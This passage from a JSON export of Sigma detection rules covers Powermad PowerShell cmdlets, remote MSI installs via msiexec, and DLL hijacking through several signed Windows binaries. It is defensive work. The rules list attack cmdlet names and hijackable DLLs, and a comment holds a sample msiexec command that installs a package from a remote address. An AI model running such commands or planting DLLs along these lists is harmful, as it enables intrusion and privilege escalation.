"https://www.netspi.com/blog/technical/network-penetration-testing/machineaccountquota-transitive-quota/",
"https://attack.mitre.org/techniques/T1059/001/",
"https://attack.mitre.org/techniques/T1557/001/"
],
"name": "t1059_001_powershell_malicious_cmdlet_powermad_script.yml",
"content": "title: Malicious PowerShell Powermad Commandlets\nid: 6c31932d-344c-4c67-80a3-09ee90425956\ndescription: |\n Detects various malicious commandlets in PowerShell scripts, generally associated with the Powermad framework.\n The Powermad framework is generally associated with Active Directory Internal DNS (ADIDNS) exploitation for privilege escalation and credential collection through LLMNR poisoning (along with tools such as Inveigh) and SMB Relaying.\n It is recommended to investigate the process tree for suspicious activities, to analyze the process responsible for the execution of PowerMad and to look for other malicious activities on the host.\nreferences:\n - https://github.com/Kevin-Robertson/Powermad\n - https://www.netspi.com/blog/technical/network-penetration-testing/exploiting-adidns/\n - https://www.netspi.com/blog/technical/network-penetration-testing/machineaccountquota-transitive-quota/\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/techniques/T1557/001/\ndate: 2022/10/12\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.credential_access\n - attack.collection\n - attack.t1557.001\n - attack.defense_evasion\n - attack.t1550.002\n - attack.persistence\n - attack.privilege_escalation\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Framework.Powermad\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains:\n # =============================== Machine Account Quota functions =====================================\n # Return machine account attributes.\n - 'Get-MachineAccountAttribute'\n # Returns Machine Account Creator. 
Usually only set when the node was created by an unprivileged user.\n - 'Get-MachineAccountCreator'\n # Disables a machine account.\n - 'Disable-MachineAccount'\n # Enables a machine account.\n - 'Enable-MachineAccount'\n # Creates a new machine account through an encrypted LDAP request. Can then be used with the `runas` command.\n - 'New-MachineAccount'\n # Removes a machine account with a privileged account.\n - 'Remove-MachineAccount'\n # Set attributes for an account that was created with Powermad.\n - 'Set-MachineAccountAttribute'\n # Recursively creates Machine Accounts, allowed due to the Transitive Machine Account Quota and updates of the ms-DS-CreatorSID attribute.\n - 'Invoke-AgentSmith'\n # ========================================= ADIDNS Functions ==========================================\n # Used to add or delete ADIDNS dynamic DNS records if secure dynamic updates are configured on a DC.\n - 'Invoke-DNSUpdate'\n # Tombstone an ADIDNS node.\n - 'Disable-ADIDNSNode'\n # Revive tombstoned node.\n - 'Enable-ADIDNSNode'\n # Return values that populate a node attribute.\n - 'Get-ADIDNSNodeAttribute'\n # Returns the owner of a node.\n - 'Get-ADIDNSNodeOwner'\n # Gets a DACL (Discretionary Access Control List, which users/groups can access an object) of an ADIDNS node or zone.\n - 'Get-ADIDNSPermission'\n # Returns ADIDNS zones.\n - 'Get-ADIDNSZone'\n # Adds access (ACE) to a node or zone DACL.\n - 'Grant-ADIDNSPermission'\n # Creates a new node thorugh an encrypted LDAP request.\n - 'New-ADIDNSNode'\n # Creates a valid byte array for the dnsRecord attribute.\n - 'New-DNSRecordArray'\n # Gets an SOA (Start of authority) serial number for a DNS zone and increments it.\n - 'New-SOASerialNumberArray'\n # Renames a node.\n - 'Rename-ADIDNSNode'\n # Removes a node.\n - 'Remove-ADIDNSNode'\n # Removes an ACE from a DACL.\n - 'Revoke-ADIDNSPermission'\n # Appends or overwrites node attributes.\n - 'Set-ADIDNSNodeAttribute'\n # Sets the owner of a Node, 
SeRestorePrivilege token required.\n - 'Set-ADIDNSNodeOwner'\n # Generating Kerberos AES-256 and 128 Keys for know username and password, this can be used as a PtH attack in InvokeDNSUPdate\n - 'Get-KerberosAESKey'\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6c31932d-344c-4c67-80a3-09ee90425956",
"rule_name": "Malicious PowerShell Powermad Commandlets",
"rule_description": "Detects various cmdlets in PowerShell scripts that are specific to the Powermad offensive framework.\nPowermad abuses Active Directory-Integrated DNS (ADIDNS) and the domain machine account quota (MachineAccountQuota) for privilege escalation and credential collection, typically combined with LLMNR poisoning tools such as Inveigh and with SMB relaying.\nIt is recommended to investigate the process tree for suspicious activities, to analyze the process responsible for the execution of Powermad and to look for other malicious activities on the host.\n",
"rule_creation_date": "2022-10-12",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.credential_access",
"attack.defense_evasion",
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1550.002",
"attack.t1557.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6cedca3d-1b27-4809-9533-e910d016c287",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076670Z",
"creation_date": "2026-03-23T11:45:34.076672Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076677Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Msiexec/",
"https://redcanary.com/blog/raspberry-robin/",
"https://attack.mitre.org/techniques/T1218/007/"
],
"name": "t1218_007_msiexec_remote_msi.yml",
"content": "title: MSI Installed from Remote URL\nid: 6cedca3d-1b27-4809-9533-e910d016c287\ndescription: |\n Detects the execution of the legitimate Windows binary msiexec.exe with an http:// or https:// URL on its command line, i.e. the download and installation of a remote MSI package.\n Adversaries may abuse msiexec.exe, a trusted system binary, to proxy the execution of malicious payloads.\n It is recommended to verify the legitimacy of the URL and of the MSI file (publisher signature, hash), with particular attention to packages fetched over plain HTTP, which can be tampered with in transit.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Msiexec/\n - https://redcanary.com/blog/raspberry-robin/\n - https://attack.mitre.org/techniques/T1218/007/\ndate: 2023/04/06\nmodified: 2025/09/09\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.007\n - attack.privilege_escalation\n - attack.persistence\n - attack.t1546.016\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Msiexec\n - classification.Windows.Behavior.FileDownload\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_msiexec:\n - Image|endswith: 'msiexec.exe'\n - OriginalFileName: 'msiexec.exe'\n\n # Installs the target remote .MSI file\n # msiexec /q /i http://192.168.100.3/tmp/cmd.png\n selection_remote:\n CommandLine|contains:\n - ' http://'\n - ' https://'\n\n exclusion_harfanglab:\n CommandLine|contains|all:\n - 'PORT='\n - 'PROTO='\n - 'HOST='\n - 'SRV_SIG_PUB='\n - '.hurukai.io'\n\n exclusion_legitimate_remote:\n CommandLine|contains:\n - '/i https://aka.ms/installazurecliwindows'\n - '/i https://awscli.amazonaws.com/'\n - '/i https://eu.ninjarmm.com/agent/installer/'\n - '/i https://repository.eset.com/'\n - '/i https://github.com/glpi-project/glpi-agent/releases/download/*/glpi-agent-*.msi'\n - '/i https://download.specopssoft.com/release/client/specops.client.msi'\n - '/i https://cdn.zabbix.com/'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6cedca3d-1b27-4809-9533-e910d016c287",
"rule_name": "MSI Installed from Remote URL",
"rule_description": "Detects the execution of the legitimate Windows binary msiexec.exe with an http:// or https:// URL on its command line, i.e. the download and installation of a remote MSI package.\nAdversaries may abuse msiexec.exe, a trusted system binary, to proxy the execution of malicious payloads.\nIt is recommended to verify the legitimacy of the URL and of the MSI file (publisher signature, hash), with particular attention to packages fetched over plain HTTP, which can be tampered with in transit.\n",
"rule_creation_date": "2023-04-06",
"rule_modified_date": "2025-09-09",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1218.007",
"attack.t1546.016"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6cfdcc4f-bbca-4275-b4f1-b08224e74407",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091010Z",
"creation_date": "2026-03-23T11:45:34.091012Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091016Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_certreq.yml",
"content": "title: DLL Hijacking via certreq.exe\nid: 6cfdcc4f-bbca-4275-b4f1-b08224e74407\ndescription: |\n Detects potential Windows DLL Hijacking via certreq.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'certreq.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\cscapi.dll'\n - '\\comdlg32.dll'\n - '\\cscobj.dll'\n - '\\cscui.dll'\n - '\\dataexchange.dll'\n - '\\davclnt.dll'\n - '\\drprov.dll'\n - '\\DUI70.dll'\n - '\\dwmapi.dll'\n - '\\explorerframe.dll'\n - '\\LINKINFO.dll'\n - '\\mmdevapi.dll'\n - '\\ncrypt.dll'\n - '\\networkexplorer.dll'\n - '\\ntlanman.dll'\n - '\\p9np.dll'\n - '\\profapi.dll'\n - '\\propsys.dll'\n - '\\secur32.dll'\n - '\\shell32.dll'\n - '\\SSPICLI.DLL'\n - '\\structuredquery.dll'\n - '\\windows.storage.dll'\n - '\\windows.storage.search.dll'\n - '\\WindowsCodecs.dll'\n - '\\WININET.dll'\n - '\\wpdshext.dll'\n - 
'\\XmlLite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Google\\Chrome\\Application\\'\n - '?:\\Program Files (x86)\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files (x86)\\Mozilla Firefox\\'\n - '?:\\Program Files\\Google\\Chrome\\Application\\'\n - '?:\\Program Files\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files\\Mozilla Firefox\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6cfdcc4f-bbca-4275-b4f1-b08224e74407",
"rule_name": "DLL Hijacking via certreq.exe",
"rule_description": "Detects potential Windows DLL hijacking via certreq.exe: a Microsoft-signed certreq.exe running from a non-standard location loads one of the DLLs it is known to search for from a path that is neither a Windows system directory nor signed by Microsoft.\nDLL hijacking takes advantage of the default Windows DLL search order by placing a malicious DLL alongside the victim application so that it is found before the legitimate library.\nAttackers use this technique by copying a legitimate Microsoft-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6d175d58-b1b2-4cc1-bd38-b7693781a88a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.600384Z",
"creation_date": "2026-03-23T11:45:34.600388Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.600396Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_hvsievaluator.yml",
"content": "title: DLL Hijacking via hvsievaluator.exe\nid: 6d175d58-b1b2-4cc1-bd38-b7693781a88a\ndescription: |\n Detects potential Windows DLL Hijacking via hvsievaluator.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'hvsievaluator.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\configmanager2.dll'\n - '\\DismApi.DLL'\n - '\\DMCmnUtils.dll'\n - '\\iri.dll'\n - '\\omadmapi.dll'\n - '\\policymanager.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6d175d58-b1b2-4cc1-bd38-b7693781a88a",
"rule_name": "DLL Hijacking via hvsievaluator.exe",
"rule_description": "Detects potential Windows DLL Hijacking via hvsievaluator.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL in the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6d3107af-5eaf-451f-ae32-aa021b68dc59",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097524Z",
"creation_date": "2026-03-23T11:45:34.097527Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097531Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_lpremove.yml",
"content": "title: DLL Hijacking via lpremove.exe\nid: 6d3107af-5eaf-451f-ae32-aa021b68dc59\ndescription: |\n Detects potential Windows DLL Hijacking via lpremove.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'lpremove.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\AppXAllUserStore.dll'\n - '\\AppXDeploymentClient.dll'\n - '\\Bcp47Langs.dll'\n - '\\DNSAPI.dll'\n - '\\FirewallAPI.dll'\n - '\\fwbase.dll'\n - '\\StateRepository.Core.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6d3107af-5eaf-451f-ae32-aa021b68dc59",
"rule_name": "DLL Hijacking via lpremove.exe",
"rule_description": "Detects potential Windows DLL Hijacking via lpremove.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL in the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6ddeb55d-9931-48b9-94c9-05459a05f932",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.601046Z",
"creation_date": "2026-03-23T11:45:34.601050Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.601057Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_cttune.yml",
"content": "title: DLL Hijacking via cttune.exe\nid: 6ddeb55d-9931-48b9-94c9-05459a05f932\ndescription: |\n Detects potential Windows DLL Hijacking via cttune.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'cttune.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DWrite.dll'\n - '\\fastprox.dll'\n - '\\OLEACC.dll'\n - '\\UxTheme.dll'\n - '\\wbemprox.dll'\n - '\\wbemsvc.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6ddeb55d-9931-48b9-94c9-05459a05f932",
"rule_name": "DLL Hijacking via cttune.exe",
"rule_description": "Detects potential Windows DLL Hijacking via cttune.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL in the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6df113cd-4125-42f2-b630-77bf2361c707",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096214Z",
"creation_date": "2026-03-23T11:45:34.096216Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096220Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_register_cimprovider.yml",
"content": "title: DLL Hijacking via register-cimprovider.exe\nid: 6df113cd-4125-42f2-b630-77bf2361c707\ndescription: |\n Detects potential Windows DLL Hijacking via register-cimprovider.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'register-cimprovider.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\miutils.dll'\n - '\\prvdmofcomp.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
